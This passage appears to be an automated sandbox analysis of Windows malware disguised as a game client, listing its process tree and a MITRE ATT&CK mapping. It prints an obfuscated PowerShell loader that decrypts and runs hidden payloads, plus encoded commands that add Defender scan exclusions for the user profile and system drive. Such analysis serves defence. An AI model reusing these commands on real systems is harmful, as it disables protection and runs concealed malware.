'C:\Users\Admin\AppData\Roaming\startup_str_670.bat';$wXwUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_670.bat').Split([Environment]::NewLine);foreach ($wtvna in $wXwUA) { if ($wtvna.StartsWith(':: ')) { $cIlpE=$wtvna.Substring(3); break; }}$payloads_var=[string[]]$cIlpE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbgB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAeAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAaQBlACMAPgA="
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAagBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAcQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAbgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAawB6ACMAPgA="
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:664
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:4464
        
        C:\Windows\Latite_Client_betterV1.exe
        
        "C:\Windows\Latite_Client_betterV1.exe"
        12⤵
        Executes dropped EXE
        
        PID:4348

C:\ProgramData\Latite_Client_betterV1.exe
C:\ProgramData\Latite_Client_betterV1.exe
1⤵
- Executes dropped EXE
PID:3632

C:\ProgramData\WebhookSpammerV5.exe
C:\ProgramData\WebhookSpammerV5.exe
1⤵
- Executes dropped EXE
PID:4368

C:\ProgramData\Latite_Client_betterV1.exe
C:\ProgramData\Latite_Client_betterV1.exe
1⤵
- Executes dropped EXE
PID:3108

C:\ProgramData\WebhookSpammerV5.exe
C:\ProgramData\WebhookSpammerV5.exe
1⤵
- Executes dropped EXE
PID:2188

C:\ProgramData\Latite Client_BetterV3.exe
"C:\ProgramData\Latite Client_BetterV3.exe"
1⤵
- Executes dropped EXE
PID:2280

C:\ProgramData\WindowsDefender
C:\ProgramData\WindowsDefender
1⤵
- Executes dropped EXE
PID:1444

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3068

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:4900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery